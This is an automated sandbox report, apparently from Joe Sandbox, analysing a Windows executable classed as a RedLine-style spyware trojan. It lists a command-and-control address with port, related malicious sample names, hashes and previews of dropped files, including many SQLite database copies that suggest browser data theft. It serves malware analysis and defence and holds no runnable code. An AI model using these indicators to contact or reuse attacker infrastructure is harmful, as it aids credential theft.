Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	K3xL5Xy0XS.exe renamed because original name is a hash value
Original Sample Name:	6AFDD0CBDF70F3E75F423B1557648E85.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/49@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 47 Number of non-executed functions: 296
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 172.67.75.172, 104.26.12.31, 104.26.13.31, 172.202.163.200, 13.107.246.63
Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: K3xL5Xy0XS.exe

Simulations

Behavior and APIs

Time	Type	Description
03:07:16	API Interceptor	63x Sleep call for process: RegSvcs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.222.58.90	DBAcglWJwi.exe	Get hash	malicious	RedLine	Browse	185.222.58.90:17910/
	QUOTATION062022.exe	Get hash	malicious	Ficker Stealer, RedLine	Browse	185.222.58.90:17910/
	QUOTATION 061622.exe	Get hash	malicious	Ficker Stealer, RedLine	Browse	185.222.58.90:17910/
	SecuriteInfo.com.Variant.MSILHeracles.37401.28222.exe	Get hash	malicious	RedLine	Browse	185.222.58.90:17910/
	RFQ - FYKS - 06052022.exe	Get hash	malicious	RedLine	Browse	185.222.58.90:17910/
	MACHINE SPECIFICATIONS.exe	Get hash	malicious	RedLine	Browse	185.222.58.90:17910/
	MACHINE SPECIFICATIONS.exe	Get hash	malicious	RedLine	Browse	185.222.58.90:17910/

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ROOTLAYERNETNL	Invoice-BL. Payment TT $ 16945.99.exe	Get hash	malicious	RedLine	Browse	45.137.22.164
	MfzXU6tKOq.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	185.222.58.82
	lWnSA7IyVc.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	185.222.58.229
	8ZVd2S51fr.exe	Get hash	malicious	RedLine	Browse	185.222.58.241
	Purchase Order Purchase Order Purchase Order Purchase Order.exe	Get hash	malicious	FormBook, GuLoader	Browse	185.222.57.90
	Purchase Order Purchase Order Purchase Order Purchase Order.exe	Get hash	malicious	FormBook, GuLoader	Browse	185.222.57.90
	9dOKGgFNL2.exe	Get hash	malicious	RedLine	Browse	45.137.22.126
	RFQ List and airflight 2024.pif.exe	Get hash	malicious	PureLog Stealer	Browse	45.137.22.174
	Calyciform.exe	Get hash	malicious	GuLoader	Browse	45.137.22.248
	I5pvP0CU6M.exe	Get hash	malicious	RedLine	Browse	45.137.22.248

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2666
Entropy (8bit):	5.345804351520589
Encrypted:	false
SSDEEP:	48:MOfHK5HKxHKdHK8THaAHKzecYHKh3oPtHo6nmHKtXooBHKoHzHZHjHKx1qHpHsLU:vq5qxqdqolqztYqh3oPtI6mq7qoT5DqO
MD5:	99EF806358EC635615FCC973DA805A5D
SHA1:	3D5E802B056A5CABB53707A30D60F9E8294CEC13
SHA-256:	99957E097E6DB3573742EFD7B473D80998DE5AEF0E473D2C505EBBB1252E8285
SHA-512:	7B340970383EB8685E2D3ADFE94E1B253DF7444ACA6EEA5859ED2DFFBCBCAFECE645961FF0C76E365EBA8ABF7A6444414E8D97363CC09BD34362E234DC51F21E
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\a3127677749631df61e96a8400ddcb87\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,

C:\Users\user\AppData\Local\Temp\aut516D.tmp

Download File

Process:	C:\Users\user\Desktop\K3xL5Xy0XS.exe
File Type:	data
Category:	dropped
Size (bytes):	74822
Entropy (8bit):	7.914269366918041
Encrypted:	false
SSDEEP:	1536:yf94gSIuZwL4WWNSn9po6VF26ddVIiV7fu7/6/Pjm/6npLMGExujS+iAmy:iB3uZwMjQ0HcLTuT6/PvuDH+iFy
MD5:	EFBA133AFE0685A74CBE14C631245B7C
SHA1:	2543F0173D222CB51546729B28AE606FD5557CDF
SHA-256:	3ABB56BEB0BE69F7A82A809EDB7DDC78DA5AD5858711FC5ACBE7D0480EE7D96E
SHA-512:	AF45F07EBB0BAD4CC4B84292D48AA5D20DD0F86D74B2F4684067183D6AE66424F747D3D6309F36F3C110F16618AA5E092E7DE2F10430314DCDC022249E88535F
Malicious:	false
Reputation:	low
Preview:	EA06..~...84.6.N....n..Q....J-j...V.U.h.ni...O..4.Q~..o.....kp<.N.".O.....E(.H.S.\.G?..e....w\.H.....n.Mer..^.[..'f=w.R...7........(..u.eZ.T)..(..#..]F.p...j.Q.. ..-j..i.H..@..<.7...+.M.Wj4...J.Tk.....hwu.. ....N..:.lmF.].....~.u..G...J.N.D.....K.3....6.... .rsQ....z..WI..3...'/..!V..&u.._..."Y$r..eN....P.&d.....P..T.u..<.6..jT.;.....UF..NCh..H....U.....j...W$@.e..0.Rj4...Y..)..{iW....=j.D.....-B.E..)S...u..[.)..2.Wh.N...D..j3....p.`h.J...4.R.s.6.D......N.Q.]s.:}..g.. . .r..P.\9...h.R........Nj....f.V...J.Q....p..L.. .z...N..+....Q.....T.O.N$.-.Rg[.Qj..D..C.Q...5$......m0....:..R....J.= ...P...6.. .Z%F.Z......>.3..T..."Of..ez.f.Q.VN..eZ..3..mF.m.....h..?..%S. ..y..:.W...T.u/.:.\|..M.@3.Z.]..d <%z.R.T)tER.g.......i_..$....E.Qo5..RC&.u+.j..CP.N#T...K.N. .8.U..+.x...Q..m..Z.Y...T....:ej.O......Q.S.T.t..Y........H......L.....+.\..R..X..1..).K.../..v.J]*.K...K.<.i..j.........F..r....4....K.J.1..)..]..Q.M..#....4.itZ.C... .....M%5@

C:\Users\user\AppData\Local\Temp\obtenebrate

Download File

Process:	C:\Users\user\Desktop\K3xL5Xy0XS.exe
File Type:	data
Category:	dropped
Size (bytes):	97792
Entropy (8bit):	6.861149961702125
Encrypted:	false
SSDEEP:	1536:G2UZPzfXtYQINw8ybnCy+db9P1wUyHjspYXI0UIlRF4P9tmKSccw:G9Zr/tY7NMbJ+djWspi8Il74PPmKSe
MD5:	F5C9A33F3F5423261FDB469888A27AD1
SHA1:	92F3D0ED439F262CDF227634CAAD344EBE051834
SHA-256:	06AE01D8BDD43054455D69A52FE04D05DC1F5BEF9493254D1A09CACEC5E7FA79
SHA-512:	1CFE459BCA1B4DC1447C9A1A12EBA7804E5BC58AC6DCAFEECB91957983D5C76E7BBF4E52DF97AC5F0DB0EC97BE66D2B51F127C084A3E104805EAE07F3F69022B
Malicious:	false
Reputation:	low
Preview:	...MSMQNAZON.JQ.PMQNEZO.2ZJQMPMQNEZON2ZJQMPMQNEZON2ZJQMPMQN.ZON<E._M.D.o.[...."8>p=#!"(.#.9+?#?9q, z=;\z#?m...n(5++.WG[iPMQNEZO.wZJ.LSM..I.ON2ZJQMP.QLDQN~2Z>PMPEQNEZON..KQMpMQNEZON2.JQmPMQLEZKN2ZJQMPIQNEZON2Z.PMPOQNEZON1Z..MP]QNUZON2JJQ]PMQNEZ_N2ZJQMPMQNE..O2.JQMP.PN.^ON2ZJQMPMQNEZON2ZJQ.QM]NEZON2ZJQMPMQNEZON2ZJQMPMQNEZON2ZJQMPMQNEZON2ZJQMPMQnEZGN2ZJQMPMQNERoN2.JQMPMQNEZON../)9PMQz6[ON.ZJQ9QMQLEZON2ZJQMPMQNEzONRt8"?3MQN.^ON2.KQMVMQN3[ON2ZJQMPMQNEZ.N2.d#(<"2NEVON2Z.PMPOQNE&NN2ZJQMPMQNEZO.2Z.QMPMQNEZON2ZJQMP].OEZON2.JQMRMTN..ON..JQNPMQ.EZIN2ZJQMPMQNEZON2ZJQMPMQNEZON2ZJQMPMQNEZON2ZJQMPMQUuSOn1ZJPMP\"OEZED0$IQMTh\|Yc$MN2^.W]PMW=GZOD..IQMTePNEq J2Z@Zu.OQNB5JN2P]FT.EQND.YQ8.CQMQh.DDZKf4ZJ[>WMQD..XP.SJQLu.SOE^gH2Z@"JPM[.`BR.;ZJPh.JPNArIN2P9VMPG.fD[OH]RJQG\u.LEZ]L.SJQG]>XNE\\JAvKQKCH@J;PON8'KQMT3[NEP\H#^C"FPM[fIZOD]WJQG-LQNAKK53ZJUR_.XNE[j. [JUeVMQD6]ON85DQMZaKP.SON3...MPIyHEZE=5ZJ[^Vf.GZd.G2ZKt..MQJm\ON8)MQMZ?PNE*1D2Z@yBPM[fUZOD]TJQG}C@J>[ON6rNPMVf]_A!NN2^bRLPKBHT\g_2Z@k.QMQ_CL \2Z@BEBEy]EZE!

C:\Users\user\AppData\Local\Temp\tmp438F.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp439F.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp43A0.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp43C0.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp43D1.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp43D2.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp43E3.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp43E4.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4404.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4405.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4406.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7AA7.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7AB8.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7AB9.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7ACA.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7ACB.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7AFA.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

